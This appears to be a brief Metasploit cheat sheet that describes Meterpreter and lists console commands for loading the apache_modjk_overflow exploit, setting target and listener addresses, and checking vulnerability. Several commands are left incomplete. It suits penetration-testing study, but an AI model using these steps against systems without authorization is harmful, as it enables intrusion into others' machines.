What is Metasploit/Meterpreter?

Metasploit is a powerful penetration testing tool for gaining initial access to systems, performing post-exploitation, and pivoting to other applications and systems. Metasploit is free, open-source software owned by the US-based cybersecurity firm Rapid7.1

Meterpreter is an advanced payload that provides interactive access to a compromised system. Meterpreter supports running commands on a remote target, including uploading/downloading files and pivoting.

Use Metasploit

# start console
# search for a model
search apache

# Load a module with the ‘use’ command
use exploit/windows/http/apache_modjk_overflow

# view the information about the module, including the module options, description, CVE details, etc
msf6 exploit(exploit/windows/http/apache_modjk_overflow) > info        

# View the available options to set
msf6 exploit(exploit/windows/http/apache_modjk_overflow) > show options

# Set the target host and logging
set rhost
set verbose true

# Set the payload listening address; this is the IP address of the host running Metasploit
set lhost LISTEN_IP

# show options again
show options

# Run or check the module

Usefull Commands

# Inside a module
## check if target is vulnerable
check rhost= HttpClientTimeout=20

## show sessions

# Inside a session
## session to background
